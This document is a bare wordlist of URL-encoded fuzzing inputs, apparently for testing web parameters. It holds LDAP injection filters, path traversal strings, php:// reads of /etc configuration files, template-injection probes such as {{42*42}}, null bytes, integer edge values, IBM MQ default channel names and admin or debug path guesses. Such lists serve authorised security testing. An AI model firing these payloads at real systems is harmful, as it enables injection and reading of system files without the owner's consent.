true
false
//*
/
//
%21
@*
%28
*/*
!
%2A%7C
%2A%28%7C%28mail%3D%2A%29%29
%26
%29
//
%2A%7C
%2A%28%7C%28objectclass%3D%2A%29%29
%7C
%26amp;
)
/
%2A%29%28uid=%2A%29%29%28%7C%28uid=%2A
%7C
@*
//*
/etc/zedxrc
/etc/zedrc
/etc/zope-extfile.conf
%2A%28%7C%28objectclass=%2A%29%29
admin*
/etc/zgv.conf
%2A%28%7C%28mail=%2A%29%29
php:///etc/zedrc
php:///etc/zgv.conf
/etc/zoph/apache.conf
*/*
php:///etc/zlibc.conf
php:///etc/zedxrc
php:///etc/zonecheck/de.profile
php:///etc/zonecheck/afnic.profile
./
../../../../../../
php:///etc/zoidrc
../
%5C/
(
%2A%28%29%7C&amp;&%2339;
php:///etc/zhcon.conf
%26quot;%26quot;%26quot;%26quot;
%26quot;%26quot;%26quot;
%26%2339;%26%2339;%26%2339;%26%2339;
%26%2339;%26%2339;%26%2339;
%60%60%60%60
%60%60%60
.
:
.%3F
%3F
!
%3F%3F
%7C%7C
!!
.!
%26amp;lt
[%26amp;apos;]
%26amp;quote
%26amp;gt
%5C
%5C&amp;apos;
[%26%2339;]
100.00
100
%5C&quot;blah
00100
100,00
+100
%5C&%2339;
$-100
100+
$100
-$100
100-
-100
%C2%A3100
%E2%82%AC-100
-%C2%A3100
%E2%82%AC100
%C2%A3-100
(,,)
-%E2%82%AC100
()
(100)
(%26quot;100%26quot;)
(100,101)
(%26quot;100%26quot;,%26quot;101%26quot;)
[]
[,,]
[100,101]
[100]
[%26quot;100%26quot;,%26quot;101%26quot;]
%7B,,%7D
%7B%7D
%7B100,101%7D
%7B100%7D
[%26quot;100%26quot;]
101
%7B&quot;100&quot;,&quot;101&quot;%7D
99
%7B&quot;100&quot;%7D
-NaN
NaN
Infinity
-Infinity
inf
-inf
0x64
1e-50
%26amp;h00
0b1100100
0.00000000000000000000000000000000000000000000000001
100e-1
%26amp;hff
100e0
100e1
1
true
-1
false
-0
0
null
+1
nil
1,,0,,0
100%20%00%00
+0
An%20Array
%20%09100
2147483647
-2147483648
4294967295
-2147483649
2147483648
4294967296
None
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
-9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
%01
%00
%05
%03
%02
%04
%07
%06
%09
%0b
%08
%0a
%0f
%0d
%0c
%0e
%0a
%0d%0a
%bf
none
null
%0d
Null
Nil
nil
None
NULL
NIL
NONE
%5C00
%5C0
%5Cx00
U+0000
u0000
%00
u+0000
%5Cu0000
0
%5C000
16649142472222295162770764775
3.38800266804e+16
2.07564741538e+16
-9223372036854775809
0x481b49d0f8d5a3e7f821066157c37c
9223372036854775807
-1.97684995314e+16
9223372036854775808
-139333426276771806651771
1.79769313486e+308
2.22507385851e-308
2139095040
79228162514264337593543950336l
79228162514264337593543950336L
-Infinity
Infinity
79228162514264337593543950336B
inf
4294967295
255
NaN
65535
256
65536
4294967296
18446744073709551615
18446744073709551616
2147483647
127
128
32767
9223372036854775807
-128
2147483648
-32768
-2147483648
9223372036854775808
-129
-2147483649
32768
-9223372036854775808
-32769
admin
-9223372036854775809
about
administrator
home
dashboard
index
portal
user
api
v3
v1
users
ping
v2
health
test
.htaccess
main
root
core
primary
help
desk
discover
page
search
gallery
desktop
images
files
contact
defined
undefined
declare
none
content
true
unkown
false
go
goto
allow
pass
ok
fail
improper
failure
missing
access
proper
trace
admin
logon
logoff
system
administrator
valid
login
invalid
warning
fail
status
service
test
info
testing
demo
verbose
debug
goto
ok
unlock
locked
install
image
file
lock
document
enable
disable
make
new
build
+
%20
%5Cu0020
%7B42%2A42%7D
%2b
%5Cu%7B0020%7D
%5Cx20
$%7B42%2A42%7D
%23%7B42%2A42%7D
0
%7B%7B=42%2A42%7D%7D
%7B%7B42%2A42%7D%7D
42*42
%7B%7B%7B42%2A42%7D%7D%7D
%5C040
%5C40
SYSTEM.AUTO.SVRCONN
SYSTEM.AUTO.RECEIVER
True
DEV.APP.SVRCONN
DEV.ADMIN.SVRCONN
False
SYSTEM.ADMIN.SVRCONN
false
$%7Bdonotexists%7C42%2A42%7D
1
%5B%5B$%7B42%2A42%7D%5D%5D
%7B%5Exyzm42%7D1764%7B/xyzm42%7D
true
SYSTEM.DEF.REQUESTER
SYSTEM.DEF.CLUSSDR
SYSTEM.DEF.CLUSRCVR
SYSTEM.DEF.RECEIVER
SYSTEM.DEF.SERVER
SYSTEM.DEF.SENDER
SYSTEM.DEBUG
SYSTEM.DEF.SVRCONN
SYSTEM.FAIL
SYSTEM.OK
SYSTEM.TRACK
SYSTEM.ERROR
dump
SYSTEM.TRACE
app.debug
debug
app.self
app.dump
app.config
self
this
_self
$this
_this
.this
1229%23%26x51;1345
1229%5Cu00511345
1229%5Cx511345
1229%511345
1229U+00511345
1229%25511345
